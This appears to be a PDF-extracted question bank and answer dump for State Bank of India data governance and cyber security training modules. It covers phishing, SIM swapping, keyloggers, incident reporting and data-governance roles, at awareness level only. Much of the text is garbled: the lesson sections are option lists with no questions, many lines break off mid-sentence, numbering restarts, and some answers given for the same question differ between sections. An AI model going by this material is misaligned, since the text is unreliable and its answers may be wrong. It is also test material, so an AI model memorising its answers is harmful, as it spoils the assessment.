d) Handing of card to other person who offered help to operate ATM
8. The habit of obtaining the confidential information of your colleagues by
direct observation from a vantage position is called
a) Spying over the shoulder
b) Direct observation
c) Shoulder surfing
d) Shoulder spying
9. The objectve of setting up a wide network of ATMs across the country
resembles which of the following triad of CiA?
a) Availability
b) Integrity
c) Confidentiality
d) None of the above
10. What is the full form of MITB Attack?
a) Man in the Bait
b) Man in the Botnet
c) Man in the Bluesnarting
d) Man in the Browser
11. Which one of the following statements is FALSE about APT attacks?
9|Page
a) In APT attacks, attacker code may spread into other machines in the
victim's network and compromise then.
b) A type of cyberattack where an unauthorized attacker code enters a
system and remains there.
c) APT attacks may help the attacker in stealing information
d) APT attacks may be identified immediately as it shuts down the whole
system
12 If you click on the padlock sign in the Address bar. Which of the following
information will be available to you?
a) You will get information on who has created the site
b) You will get information on the IT company that maintains the site
c) You will get information on who owns the site and who has verified the
site
d) You will get information on Reserve Bank of India
13 What makes SolarWinds attack an unusual hack?
a) The hackers seriously damaged the energy supply
b) The hackers through one malicious code in the application of SolarWinds
vendor's application gained access to Orion softw.
c) The hackers targeted a government agency like Pantagon
d) The hackers through one malicious code in SolarWinds Orion software
gained access to thousands of other companies.
14 What is Denial of Service Attacks?
a) It is a malicious attempt to disrupt the normal traffic of a targeted server,
service or network with a flood of lnternet traffic from multiple computers
at the same time
b) It is an attack meant to shut down a machine or network, making it
inaccessible to its intended users
c) A type of attack whereby malicious commands are sent to a
system/application through unauthorized channels.
d) An attack used to monitor and potentially modify communications
between two users.
15 Pretending to be an Airtel customer service executive and contacting the
victim is called
a) Phishing
10 | P a g e
b) Spoofing
c) Smishing
d) Vishing
16 A Cyber-Attack
a) is not limited to, stealing, altering or destroying the systems/network,
disrupting operations and causing information or identity theft
b) is a targeted assault on the Bank's cyberspace and its underlying
infrastructure systems
c) option a or b
d) option a & b
17. SBI internet banking site provides a facility to bypass such keylogger
malware. Identify the feature.
a) Image Captcha
b) Online Virtual Keyboard
c) Audio Captcha
d) Biometric access
18 Which of the following Mobile Apps may be suggested to resolve the issues
related to non-receipt of OTP (Through SMS) for their transaction?
a) SBI Secure OTP
b) SBI Quick
c) YONO Lite
d) BHIM SBI Pay
19 A fraudster may use Social engineering techniques to steal critical
information of a user. Which of the following options is not true in case of social
engineering?
a) Utilizing manipulative methods to obtain (confidential) information
through unauthorized methods
b) Social engineering uses Human traits, Curiosity, Concern around and
technical hacking techniques
c) In Social engineeringattacks, the fraudsters lure/appealthe potential
victims to gain confidence to reveal confidential information and use the
same for fraud and system access.
d) Social engineering is to gain access to sensitive information, systems or
data by using human psychology
11 | P a g e
20 Which of the following options is not to protect yourself from keyloggers?
a) Check your physical hardware, keep your system locked
b) Antivirus and protect from unauthorised access. companies keep their
records of the most common malware keyloggers and will flag them as
dangerouS.
c) Use a reputable antivirus software to scan your computer on a regular
basis.
d) Regularly inspect your computer and the surrounding area to make sure
you know each piece of hardware.
21 Select the incorrect option.
a) Dark Web -llegal Information & Private forums
b) Deep Web Internet Banking & Hidden wiki
c) Surface Web Facebook & Wikipedia
d) Deep Web Research Papers & Medical Records
22 What is not true about SIM Swapping?
a) SIM Swapping is also known as SIM Jacking
b) SIM Swapping is also known as SIM cloning
c) SIM Swapping is also khown as port out scamming
d) All are true
23 The malware, which can record the keystrokes on a keyboard in order to gain
access to sensitive information is known as malware.
a) Keylogger
b) Scareware
c) Spyware
d) Fileless
24 Even if a user compromises his/her login credentials of OnlinesB!, no one can
login using this credential. What is the new security feature in OnlineSB1?
a) Audio Captcha in the login screen.
b) Virtual keyboard in the login screen
c) OTP has been made mandatory at the time of login
d) Image based Captcha in the login screen
12 | P a g e
25 is a technique used by the fraudsters, wherein they penetrate a system where
the program/script/files will be hidden within another file.
a) Man in the Middle attack
b) Steganography
c) Phishing
d) Spoofing
26. If a Cyber attack is carried out by sending to SBI' customers an email that
claims to be from SBI but it's not, then what kind of cyber attack technique is it?
a) DOS Attack
b) State Sponsored attacks
c) Phishing Attack
d) Web defacing
27 Which of the following principles of the first of the CIA Triad Confidentiality
is/are Correct?
a.Confidentiality is the concept of the measures used to ensure the
protection of the secrecy of data, objects, or resources.
b.The goal of confidentiality protection is to prevent unauthorized access
to the information.
c .Confidentiality focuses security measures on ensuring that none other
than the sender of a message is able to read it.
a) Only a and b
b) a, b and c
c) a, cand d
d) a, b and d
28 Your friend fears that he has shared the user credentials of OnlineSBI with a
stranger. It is a Sunday and Bank is closed. What immediate steps would you
NOT advise him?
a) Type an incorrect login password 4 times so that the username gets
locked for a day
b) Change the password
13 | P a g e
c) Contact the Brarnch on Monday to deactivate INB facility
d) Lock User access using the relevant link
29 Which of the following principles of the second of CIA Triad Integrity is/are
Correct?
a.Integrity is the concept of protecting the accuracy and completeness of
information and processing methods.
c. Properly implemented integrity protection provides a means for authorized
changes while protecting against intended and malicious unauthorized activities
(such as viruses and intrusions) as well as mistakes made by authorized users (by
commission or ormission).
d. Use of a secure Hashing algorithm for the information ensures Integrity.
a) Only a and b
b) a,b and c
c) a, cand d
d) a, b and d
30. Which one is not an option for disabling UPI services?
a) YONO Main Screen UPI Enable/DisableUPI
b) CBS App menu UPI Disable/Re-enable UPI
c) Branch Interface (Maker-Checker Concept):
d) Contact Centre: 1800112211/18004253800
31.What is not true about Juice-jacking? Disabling data transfer mode in
Settings will not help in this case
32.The data loss or compromise while charging the mobile is
called________.: Juice Jacking
33.Even if a user compromises his/her login credentials of OnlineSBI, no one
can login using this credential. What is the new security feature in
OnlineSBI?: OTP has been made mandatory at the time of login
34._____________is used for obtaining unauthorized access to mobile
phones via Bluetooth connection. Once such a connection is established
then the attacker will be able to steal photos, messages and contacts etc.
: Bluesnarfing
14 | P a g e
35.Your friend fears that he has shared the user credentials of OnlineSBI with
a stranger. It is a Sunday and Bank is closed. What immediate steps would
you NOT advise him?
36.Which of the following is NOT an objective of Non-repudiation?
It offers a high level of assurance that the information, objects and
resources are accessible to authorized subjects within the promised
timeframe.
37.Which of the following is not the examples of data?
38.Which one of the following statements is more appropriate in terms of
Vendor risk assessment? Continuous assessment of Vendor security
practices need to be done throughout the Contract life cycle.
39.What makes SolarWinds attack an unusual hack?
The hackers through one malicious code in the application of SolarWinds
vendor’s application gained access to Orion software
40.Non-repudiation is carried out through the services of authentication,
authorization, confidentiality, and integrity. Confidentiality ensures which
one of the following?
Secure encryption of the information
41.Select the wrong statement.: Option a & b
42.Pretending to be an Airtel customer service executive and contacting the
victim is called____________.: Vishing
43.Which one of the following is the leading illicit dark web marketplace
which was taken down by the FBI in what was considered then as a
significant action on the Dark web market?
Silk Road 2.0
44.A fraudster may use Social engineering techniques to steal critical
information of a user. Which of the following options is not true in case of
social engineering?
Social engineering uses Human traits, Curiosity, Concern around and
technical hacking techniques
45.Which one of the following statements is false?
46.What is not true about SIM Swapping?
SIM Swapping is also known as SIM cloning
15 | P a g e
47.Which of the following attacks is not categorised under Exploit based
attacks?
Distributed Denial of Service attacks
48.If a Cyber attack is carried out by sending to SBI's customers an email that
claims to be from SBI but it's not, then what kind of cyber attack technique
is it?
Phishing Attack
49.Mr. Ajay had tried to login to Mr. Deepak's SBI net banking. He tried thrice
but failed. Now when Mr. Deepak tries to login with his correct password
will he be able to do so?
After 3 invalid attempts, the user id is automatically locked for one day.
Thereafter Mr. Deepak can login.
50.What is a “Collect Request” in a UPI transaction?
It is a feature available in BHIM SBI Pay
51.If you want to change the username and password for your SBI Internet
banking, which of the following statements is correct?
You cannot change the Username but he/she can change the password at
any time
52._____________ is a technique used by the fraudsters, wherein they
penetrate a system where the program/script/files will be hidden within
another file.
Steganography
53.The technique used to send the emails to all the employees of the Bank is
known as ____________.
Spear Phishing
54.If a hacker manages to exploit the vulnerability before software
developers can find a fix, that exploit becomes known as a _______.
Zero day attack
55.Third party attacks are attractive to hackers, because ____________.
Third party systems have less robust security controls
56.What makes SolarWinds hack one of the biggest and the most dangerous
Cyber attack?
This attack was designed to impact one vendor and subsequently all their
clients
57.Where is the option to lock user access in SBI Retail Internet Banking?
Lock User access option is available in the login page of Retail INB
16 | P a g e
58.__________ malware is a warning-like popup or reminder in a
Laptop/PC/Mobile?
Scareware
59.Social Engineering Attacks does not include ________________.
Denial of Service attack
60.Which one of the following statements is FALSE about APT attacks?
APT attacks may be identified immediately as it shuts down the whole
system Submit
17 | P a g e
DGCS: Module 4 (24/30)
1. Which of the following steps would not be a part of the planning for Work
from home?
a) Arranging official laptops with proper configuration for the employees
b) Providing connectivity through a reputed service provider
c) Ensuring the physical access to the systems room is restricted and
monitored
d) Installing Anti-Virus in these systems

a) The patches could not stop the spreading malware
b) Ransomware Malware affects more devices in less time.
c) Ransomware Malware uses simple encryption codes to encrypt a victim’s
files.
d) The motive for this Ransomware attack is always monetary
3. Which one of the following options is NOT a violation of acceptable usage

policy?
a) There was a data vulnerability due to lack of Anti-virus
b) The laptop was not protected by password
c) There was a breach of critical and confidential data.
d) The laptop was kept open, and the desktop was not locked
4. “Ransomware” can be spread through_____________?

5. Malicious email attachments and Malicious apps
6. Infected external storage devices and Compromised websites
7. Option 1 or 2
8. Option 1 and 2
5. Which of the following options is crucial in any UPI fraud related to Collect
request?
a) QR Code of your Virtual Payment Address
b) Your Virtual Payment Address
c) Your Account no.
d) option a & b
18 | P a g e
6. As part of IS awareness, SBI observes Computer Security Day on which of the
following day?
a) 01st April
b) 01st October
c) 30th November
d) 30th September
7.What is the meaning of Shadow Reversal?
a) Reversal of loss amount to customer account if Bank fails to resolve the
customer complaint within 90 days and it is allowed to withdraw by
customer
b) Reversal of loss amount to customer account if Bank fails to establish
customer negligence within 10 days, but it is not allowed to withdraw by
customer
c) Reversal of loss amount to customer account if Bank fails to resolve the
customer complaint within 90 days, but it is not allowed to withdraw by
customer
d) Reversal of loss amount to customer account if Bank fails to establish
customer negligence within 10 days, but it is allowed to withdraw by
customer
8. What action will you take, when you are defrauded?
a) Change the username immediately
b) Write a letter to the RBI immediately
c) Lock the user access immediately
d) Send a written letter to the branch immediately
9. Select the wrong statement about the Acceptable usage policy (IS Policy) of
our Bank?
a) Users should not install any software that is not authorized for the Bank’s
business.
b) Users on whose PC / Server such software runs shall be solely responsible
for Copyrights / IPR violation, Legal and Penal actions as per IT Act
c) Successful backup of critical applications or data should be ensured yearly
and to be kept offsite.
d) All are true
19 | P a g e
10. Which of the following options is an example of inappropriate use of the e-
mail service?
a) Use the accounts of others with their permission
b) Authorized exchange of proprietary information or confidential
information
c) Use of other officers' user ids or using a false identity.
d) Creation and exchange of e-mails information or content for official
purpose.
11. Select the wrong statement about Desktop / Laptops /Workstations Usage?
a) Lock your PC by pressing Windows key + L
b) There is nothing important on my computer is a myth
c) Create a shortcut of a document/file instead of copying it on the desktop
d) Always lock your desktop, when you are away from it.
12. Which one of the following options does not substantiate the Acceptable
Usage Policy of our Bank?
a) Always lock your desktop while leaving your seat.
b) We need to protect the data by following acceptable usage policy
guidelines of our bank.
c) However, Mobile and laptop given to the staff for personal holding have
exceptions to the policy.
d) All the workstations / devices should be protected by strong passwords.
13. Which of the following options is not a violation of acceptable usage policy?
a) Users shall be responsible for the activities carried out on their client
systems, using the accounts assigned to them.
b) The User is responsible for any e-mail that is transmitted using the e-mail
c) Use of personal mail of Bank’s official for his personal purposes is
acceptable.
d) All e-mails sent through the mail server are the sole responsibility of the
user owning the account
14. Which of the following is NOT inappropriate content of email?
a) Sending absence unsolicited emails and links.
b) Sending mail that damages the reputation of the Bank, contains viruses,
worms, or malware
20 | P a g e
c) Confidential or secret information with a password protection when
transmitted over email.
d) Using email systems to copy and transmit any document, software or
other information protected by copyright or any other law.
15. If ATM Skimming happens at an ATM, who can report to IT Team?
a) ATM Channel Manager
b) Anyone
c) Branch Manager
d) option a & b
16. Select the correct statement about Desktop / Laptops /Workstations Usage?
a) Creation of email shortcut on the home screen of desktop
b) Anti-virus is crucial for safety of data. While leaving the room user is
supposed to put the laptop for scanning.
c) Locking by pressing Windows key and L key simultaneously.
d) Shutting down the laptop
17. Which one of the following options is not a concern for password security?
a) Password should be treated like signature
b) Users are responsible for all activities originated from their User
credentials
c) In case of any breach in a Social Media Handle, delete your Social Media
Account instead of changing the password.
d) Password is required to be sufficiently long and secret
18. Cyber security incidents can be reported
a) by home branch only
b) by any employee
c) by public
d) by any employee or public
19. Impact of Cyber risks are_________________.

a) Loss of Intellectual Property and reputational damage
b) Cost
c) Financial loss & Business disruption
d) All of the above
21 | P a g e
20. Select the wrong statement.
a) Do not play online games on company devices as they may download
trojans.
b) For online meetings, Manage screen sharing options. Change screen
sharing to “Host Only.” Avoid file sharing
c) Secure your Wi-Fi router connections by enabling WPA2 + AES security
d) For web security, verify full URL by clicking the link, but do not give any
21. Pick the correct ones as a good practice? (i) We should install a standard
antivirus in our laptop ii) We should restrict access to the laptop by using a
strong password (iii) We should avoid using a free WiFi
a) Options (i) , (ii) and (iii) are correct
b) Options (i) and (ii) are correct
c) Option (iii) alone is correct
d) Options (ii) and (iii) are correct
22. What is the “Time of detection of incident” for reporting the purpose of a
cyber incident to RBI, CERT-In & NCIIPC?
a) Time at which, the incident is brought to the knowledge of any official of
AO, including DGM & Module CISO
b) Time at which, the incident is brought to the knowledge of any official of
ISD, including RM & RBO CISO
c) Time at which, the incident is brought to the knowledge of any official of
LHO, including CGM & Circle CISO
d) Time at which, the incident is brought to the knowledge of any official of
ISD, including CGM & Group CISO
23. Can we create the password in other regional language (Other than English
and Hindi) in Retail Internet Banking?
a) You can use the multilingual image based virtual keyboard in Hindi or
Tamil only
b) You can use the multilingual image based virtual keyboard in Hindi or
English only.
c) The multilingual image based virtual keyboard is available in 13 languages.
d) The multilingual image based virtual keyboard is available in Hindi , Tamil,
Oriya or Marathi only
22 | P a g e
24. Pick the odd one.
a) Passwords should be complex, sufficiently long and secret.
b) Passwords should not be treated like signatures.
c) Passwords must be created using small & upper case, when own name or
short form of own name and own initials are used.
d) Users are responsible for all activities originating from their user
credentials.
25. Which of the following options is NOT a good wi-fi security practice?
a) Secure your Wi-Fi router connections by enabling WPA2 + AES security
b) Change the default network name and password of your router used for
login
c) Connect to office network strictly through company provided means
d) You can use unsecure or open Wi-Fi for official purposes in case of
emergency
26. Which one of the following is the most important aspect for an organization
as big and global as SBI to protect itself from cyber security attacks and
subsequent loss of brand image?
a) An awareness program among all the customers to provide education and
guidance on a range of topics, including email, cloud and mobile security.
b) A training and awareness program for all the employees in the
Information Security department.
c) A training awareness program that would provide education and guidance
on a range of information security topics to all the internal users of its
systems and applications.
d) A training program for all the vendors to underscore secure coding
practices.
27. Select the wrong statement.
a) EMV chip cards are vulnerable to Skimming
b) Using EMV chip cards rather than Magstripe cards in ATM is more secure
c) End-to-End encryption in the communication between the 'ATM
Terminal' and the 'ATM Switch' may prevent breaches
d) Using Tamper proof keypads and anti-skimming devices in the ATM
23 | P a g e
28. In order to report an incident if you are asked to forward the SMS received
from the Bank to a certain mobile number given in the SMS. Which of the
following SMSs is to be forwarded?
a) SMS containing the OTP for the transaction
b) SMS alert received after the transaction containing the details of the
transaction
c) either of the above
d) Neither of the above.
29. Creating IS awareness is important at all levels in the Bank. But the initiation
should start from _______________.
a) Circle Management
b) Board of Directors
c) Middle Management
d) Branch staff
30. Which of the following options is not related to ATM fraud?
a) Phishing, Vishing
b) ATM hacking, password stealing
c) Card swapping, ATM Jackpotting
d) Skimming, Cloning
31.Where is the option to change the Login password in Retail Internet

Banking?Option to change login password is in the Profile section, post
login
32.Select the wrong statement.
For online meetings, share a link to a meeting on an unrestricted publicly
available social media post, only with password
33.Customer reported an unauthorised UPI transaction of Rs.72,000/- in his

account. He reported the incident on the same day to the bank. The bank
is not able to establish customer negligence even after completion of 90
days from the date of complaint. As per Limiting Liability of customer
guidelines, how much amount does the Bank needs to pay to the
customer in this situation?
Rs.72,000/-
34.Which of the following statements is correct regarding creation of Profile

password using the Multilingual Image based Virtual keyboard? The
24 | P a g e
Profile password should be a combination of alphabets (in the language
35.Which of the following will not be considered as cyber incidents for

reporting to RBI?
36.Pick the odd one.
Passwords must be created using small & upper case, when own name or
short form of own name and own initials are used.
37.In order to report an incident if you are asked to forward the SMS received
from the Bank to a certain mobile number given in the SMS. Which of the
following SMSs is to be forwarded?
SMS alert received after the transaction containing the details of the
transaction
38.Websites use CAPTCHA to avoid password guessing by automated tools

to prevent from _______.
Dictionary Attack

Password need not be necessarily be complex but easy to remember.
40.To protect from Ransomware Malware attacks, we must __________.

All the above

EMV chip cards are vulnerable to Skimming
42.Which one of the following statements is not a threat to mobile and

portable devices?
The updates in the operating systems (say Android, iOS etc.) and installed
applications might compromise the security of these devices.
43.Identify some of the risks involved in using public free WiFi.
25 | P a g e
44.Which one of the following options does not substantiate the Acceptable
Usage Policy of our Bank?
However, Mobile and laptop given to the staff for personal holding have
exceptions to the policy.
45.Which of the following statements is not true about Acceptable usage
policy (IS Policy) of our Bank?
46.What is the timelines for reporting of cyber incidents to RBI and other
Statutory Authorities CERT-In & NCIIPC? Who should report the incident?
All cyber security incidents should be reported within 24 hours by Incident
Response & Management Team
47.Select the wrong statement from the below statements.

(i) Lock your phone with mPIN or password OR biometric when not
in use. Always keep your mobile device in a safe location.
(ii) (ii) Download the Mobile Banking application only from the
Bank’s site – www.sbi.co.in. For using Mobile Banking service
over insecure Wi-Fi, never click on any links. Always type the URL
http://mobile.prepaidsbi.com/sbiwap/ in your mobile browser
(iii) (iii) Check your linked accounts on a regular basis. Once your
transaction is over, logout of the mobile banking website and
then close the browser.
(iv) (iv) Delete any SMS from the Bank that might contain your
personal information like user Id, mPIN received at the time of
registration, or details sent to you. Do not part with your ATM
card and PIN as this may be misused for Mobile banking
registration.
All are correct
48.Cyber security incidents can be reported: by any employee or public
49.Creating IS awareness is important at all levels in the Bank. But the

initiation should start from _______________. Board of Directors
50.Which of the following options is NOT the best password security
practices?
51.Impact of Cyber risks are_________________.
All of the above
26 | P a g e
52.Many websites use CAPTCHA to avoid password guessing by automated
tools called ____________.
Dictionary Attack
53.What should be the minimum and maximum length of the login password
in Retail Internet Banking?
Minimum length should be 8 characters and maximum length 20
characters
54.Which one of the following options is not a concern for password
security?
55.Which of the following options is not related to ATM fraud?
Phishing, Vishing
56.Which of the following is NOT one of the best practices to maintain your
password?
Only difficult dictionary words should be used
57.Which one of the following options is not considered as incident for
reporting to RBI, NCIIPC and CERT-In?
Accounting/clerical errors (incorrect ledger posting – cr/dr) that are
rectified subsequently.
58.Which of the following steps would not be a part of the planning for Work
from home?
59.Which one of the following is the most important aspect for an
organization as big and global as SBI to protect itself from cyber security
attacks and subsequent loss of brand image?
An awareness program among all the customers to provide education and
guidance on a range of topics, including email, cloud and mobile security.
60.“Ransomware” can be spread through_____________?
Option 1 and 2
********
27 | P a g e
LESSON 1

DGM & CFO
GM NETWORK
DGM AND CDO
CIRCLE CGM


Create
Read
Modify & Delete
All of the Above
Data Architects
Data Owners
Data Trainers
Data Stewards

Assure Data quality
All of the above
FALSE
TRUE

CGM (R&DB Ops)
CGM (Compliance)
People
Processes
Practices
Technology
Big Data Strategy
None of the Above

DMD COO
CHAIRMAN
CDMO
MD (R&DB)

All of the above
Improper KYC
None of the Above

DGM & CCO
DGM (Vigilance)
DGM & CFO
DGM & CRO

All of the Above

Data Quality
Analytical Models
Both 1 & 2
Neither 1 nor 2

Compliance with relevant legislation, regulatory requirements, policies, procedures and standards.
To define the roles and responsibilities for Data stakeholders, and to establish clear lines of accountability.
All of the above
Monthly
Quarterly
Half yearly
Bi monthly

Anlytical Processes
All of the Above


FALSE
TRUE

RM
DGM (B&O)
AGM/CM GB
GM NETWORK
All of the Above

External Parties
Magically
Logs and devices

All of the Above

BM
1& 2
Checker
Maker

Data Process
Data Quality
Note
Dashboard

TRUE
FALSE
Bi monthly
Quarterly
Half yearly
Monthly

All of the above
LESSON 2


Public Information
Both 1 & 2
None of the above

Income leakage
Excess Income
Customer Complaints
All of the above

Virtual Time
System
Batch
Real Time
E-mail

Neither DQ nor KRI
Both DQ & KRI


Operations
Planning
Decision-making
All of the above
All SBI employees
All of the above
TRUE
FALSE

Wi-Fi encryption
All of the above
In an Account Opening Form, if Data has been provided by customer in non mandatory field ( like mobile number /em
All of the above
Both 1 & 2
Neither 1 nor 2

DQI Dashboard
MIS Online

SENSITIVE
INTERNAL
CONFIDENTIAL
PUBLIC

TRUE
FALSE


All of the above
A customer has submitted Voter Card as OVD, along with AOF. During the scrutiny, it was found that the age of custo
OVD can be accepted
If a car dealer asks us for a list of customers having existing car loans, to market loans for new cars for us, shall we sh
Either 1 or 2
Cannot be shared
Incorrect classification of values like Gender or Customer Type comes under which one of the following Data Quality
Accuracy
Validity
Consistency
Completeness

SENSITIVE
PUBLIC
CONFIDENTIAL
INTERNAL

SENSITIVE
INTERNAL
PUBLIC
CONFIDENTIAL
Both 1 & 2
Neither 1 nor 2

Either 1 or 2
Both 1 & 2 above
1& 2
No Impact
What are the two important pillars of the SOP on ‘Customer Sensitive Granular Data Sharing and Access – Within Ban
None of the above
FALSE
TRUE

Customer One view
All of the above
LESSON 3

A type of attack whereby malicious commands are sent to a system/application through unauthorized channels.
It is a malicious attempt to disrupt the normal traffic of a targeted server, service or network with a flood of Internet tra

After customer verification, the mobile operator deactivates the old SIM card in customer possession and issues a new
Under the pretext of having lost the phone, fraudsters contact the Mobile operator and create a fake ID.

All are true

Keylogger
Scareware
Fileless
Spyware
a.Confidentiality is the concept of the measures used to ensure the protection of the secrecy of data, objects, or resour
Only a and b
a, b and c
a, c and d
a, b and d

SIM Swapping is a fraud that occurs when the fraudsters manage to get a new SIM card issued for a specific registered m
Phishing or social engineering techniques are used to obtain personal information of the customers/users.
Option b & c
With the enhanced sharing of information over a global network for almost all life functions , which one of the follow
Authentication
Non-repudiation
Authorization
Non-refutation


Which one of the following is the leading illicit dark web marketplace which was taken down by the FBI in what was
Silk Road 2.0
DisrupTor
Tor
Dark Market
The technique for sending SMS that appears to be initiated from the organization for KYC updation, Account credit, A
Vishing
Spoofing
Stegnography
Identity theft
Smishing
Vishing
Phishing
Spear Phishing
Supplier attacks
Vendor attacks

The hackers through one malicious code in the application of SolarWinds vendor’s application gained access to Orion so
The hackers through one malicious code in SolarWinds Orion software gained access to thousands of other companies.
Your friend fears that he has shared the user credentials of OnlineSBI with a stranger. It is a Sunday and Bank is close
Change the password
Even if a user compromises his/her login credentials of OnlineSBI, no one can login using this credential. What is the

DNS Spoofing
Logic Bomb
IP Spoofing
Wi-fi eavesdropping
c.Properly implemented integrity protection provides a means for authorized changes while protecting against intende
omission).
Only a and b
a, b and c
a, c and d
a, b and d
Which of the following browsers allows access to the Network which is popular for implementing encrypted routing
Chrome
Edge
Tor
Firefox
Spoofing
Keylogger malware
Vishing
Social engineering

Contact Centre: 1800112211/18004253800
Ajit is doing a merchant transaction to pay the mobile bill. He selects net banking of SBI for making online payment. H
If you want to change the username and password for your SBI Internet banking, which of the following statements i

A Cyber-Attack
is not limited to, stealing, altering or destroying the systems/network, disrupting operations and causing information or
option a or b
option a & b
_____________is used for obtaining unauthorized access to mobile phones via Bluetooth connection. Once such a co
Bluesnarfing
Steganography
Spoofing
A type of cyberattack where an unauthorized attacker code enters a system and remains there.
In APT attacks, attacker code may spread into other machines in the victim’s network and compromise them.
Audio Captcha
Image Captcha
Biometric access
LESSON 4
1
Which one of the following is the most important aspect for an organization as big and global as SBI to protect itself f
A training and awareness program for all the employees in the Information Security department.
An awareness program among all the customers to provide education and guidance on a range of topics, including ema
A training awareness program that would provide education and guidance on a range of information security topics to a
2
ATM Channel Manager
Branch Manager
3
4
After the system got affected by WannaCry, Microsoft released the patch for the system which has updated security.
This was only one month after Windows released patches for the exploit, meaning that computers that had yet to upda
5
6
Shoulder surfing
Dictionary Attack
Bruetforce Attack
Guessing
7
8
Phishing / Vishing attacks on customers resulting cumulative loss for the customer(s) exceeding ₹ 50 lakh
All incidents which lead to customer service disruptions due to non-availability of IT systems
All of the above
9
If a Bank always allow some of the employees to bring their own laptops, smart phones, tablets etc. to office for offic
Buy Your Own Device
10
The multilingual image based virtual keyboard is available in Hindi , Tamil, Oriya or Marathi only
11
Pick the odd one.
Passwords must be created using small & upper case, when own name or short form of own name and own initials are
12
Users on whose PC / Server such software runs shall be solely responsible for Copyrights / IPR violation, Legal and Pena
Successful backup of critical applications or data should be ensured yearly and to be kept offsite.
All are true
13
Employees, to whom State Bank owned laptops or any other Portable devices are issued, are responsible for its safe cu
Employees who are authorized to access emails and Bank’s data on mobile devices should ensure that MDM application
Loss of portable devices should be reported immediately to the local police and to the appropriate authority.
14
15
The company asked their employees to use their own devices and internet access while working from home. List som
16
17
DoS/DDoS attack not lasting beyond 30 minutes contiguously or not impacting the customer service/digital channels ev
All of the above
18
Which of the following statements is correct regarding creation of Profile password using the Multilingual Image bas
The Profile password should be a combination of alphabets in two of the languages chosen
The Profile password should be a combination of alphabets (in the language chosen), and numerals and special charact
The Profile password should be a combination of alphabets (in the language chosen), and numerals and images
The Profile password should be a combination of alphabets (in the language chosen) and numerals
19
Which one of the following applications is not a threat to compromise confidentiality of the data of portable devices
Facebook
Air watch agent
WhatsApp
True caller
20
Call the Branch
Option a or c
21
22
23
24
25
What is the timelines for reporting of cyber incidents to RBI and other Statutory Authorities CERT-In & NCIIPC? Who
26
27
by home branch only
by public
by any employee
28
29
30
For online meetings, Manage screen sharing options. Change screen sharing to “Host Only.” Avoid file sharing
DATA GOVERNANCE AND CYBER SECURITY MODULE 1
Q: Data Governance Organisation involves a multi-tiered combination of business and

A: All of the above
Q: Data Governance Policy is applicable to all the domestic offices of SBI including:
A: All of the above
A: Monthly

A: All of the Above
Q: At the time of account opening, it was found that Educational Qualification was not
mentioned by the customer in AOF, but it is a mandatory filed in CBS
A: Teller should contact, the customer and get the required details and then fill in CBS

A: FALSE

A: All of the above

A: Business Needs

A: TRUE
Q: Data Governance Council-Business Unit/Vertical is being headed by

A: CGM

A: All of the Above
Q: Data Management Officer is accountable for all Data Governance related activities of
their respective department
A: FALSE
Q: Data Governance Policy is formulated by which Department:

A: Compliance Department
A: All of the Above
Q: Which one of the following does NOT come under People factor in Data
Management prctices?
A: Data Trainers

A: All of the Above
Q: Data Governance Policy is applicable to third parties having access to SBI network
and Data
A: TRUE
Q: Administrative office Data Governance Council (A-DGC), is headed by

A: DGM (B&O)

initiatives?
A: People
Q: Data is always originated within the organization

A: FALSE
Q: (i) Data Governance is about the rules how to build the content.
(ii) Data Privacy is about the rules how to protect and use the content.
A: Only (ii) is correct
could be generated for an Analytics based product. What could be the underlying
reason?
Q: Incorrect handling of data may result in exposing an organization to significant

liabilities.
A: TRUE
Q: Technology Solutions which help in data Governance initiatives include ____

A: All of the Above
Q: Which activity are considered under Data Management?

A: All of the above
Q: What are the main sources for low Data Quality?
A: Manual Data Entry
Q: While creating new CIF, customer has given marital status, but as it is not mandatory
in CBS:
A: As the customer has given the details in AOF, teller should fill the same in CBS

A: FALSE
A: Quarterly
Q: Technology Solutions which help in data Governance initiatives include ______

A: All of the Above
Q: Process for submission and handling of the Data request is mentioned in

A: Both
Q: _________________is ultimately accountable with regard to the definition, Data quality

A: Data Custodian

A: All of the Above
Q: Who among the following has a role to ensure that data governance initiatives are
aligned with business needs
A: Data Team
Q: Inconsistent Data in Annual Income fields vis a vis customer profile may primarily result
in ________
A: Incorrect AML/CFT compliance

Q: Data Governance Policy is applicable to third parties having access to SBI network and
Data.
A: TRUE
Q: What is/are the responsibility(ies) of the Data Governance Council (DGC)

A: All of the above
could be generated for an Analytics based product. What could be the underlying reason?
A: All of the above
Q: Data Governance Policy is applicable to

A: All employees of the Bank
Q: Prime objective of Data governance framework is to ensure-

A: All of the above
Q: Data Management Office reports to which of the DMDs

A: DMD & Chief Information Officer

A: TRUE
Q: As per the Bank's Data Governance structure, presently which is the Apex body for Data
Governance?
A: Apex level Data Governance Council (ADGC)
Q: Which of the following is/are a Key Data Quality Dimension?

A: All of the above
Q: The primary priority of Data Processes must be _____

A: MIS Needs
Q: ________shall ensure that there is commensurate adherence, management and periodic

upkeep/review for Data in their respective custodies, asprescribed by Data Governance Policy
A: Data custodians
initiatives?
A: Regulators
Q: Data-driven business decisions are possible when _____ is involved in the Data
Governance.
A: Business Unit
Q: ____ is DGO of Circle

A: DGM & CRO

A: Business Needs

A: Definitions of how data will be moved and changed

A: All of the Above
Q: The word “Data” shall collectively refer to the following descriptions:

A: All of the above
Q: Analytics refers to the process of using Data in order to:

A: All of the above
DATA GOVERNANCE & CYBER SECURITY MODULE -2
Q: Which of the following is true:

A: Data Privacy is about the rules how to protect and use the contents
Q: An SBI Card employee sitting in an branch asks for list of high value customers
along with Mobile numbers for telecalling to sell SBI cards for the Branch. Branch
may share the list with SBI Card employee.
A: FALSE

Q: Capturing of incorrect security in secured loan accounts may result in

_____________.
A: Both 1 & 2
A: 1 & 3
Q: As per Data Protection Bill (Draft) PII stands for

A: Personally Identifiable Information
I
Q: To boost the housing loan business of the branch , list of HNIs can be shared with
HLCs through:
A: Not to be shared
Q: India is coming with its own Bill on Data Protection which is called ___
A: Personal Data Protection Bill
Q: Project Ganga Dashboard include divergences related to:

A: Both DQ & KRI
Q: Branch has sanctioned a Car loan to one of his staff, but the loan instalment was
not fed in HRMS. The staff paid the instalment through his account and informed the
BM that a SI has been registered for the same.
A: Recovery to staff loan should be through HRMS only, so recovery details in
HRMS needs to be updated
A: 1& 2
A: Cannot be shared
Q: DQI Index has been included as one of the Key Responsibility Areas (KRAs) in
Career Development System (CDS)
A: TRUE
Q: Data quality is necessary to fulfil the needs of an organization in terms of

A: All of the above
Q: Data Quality Index (DQI) dashboard measures the Data Quality for-
A: CIFs & Loans
Q: Updated policies or SOPs on Data Governance can be accessed through?

A: >>SBI Times>>MIS Online >>SOPs>>DMO

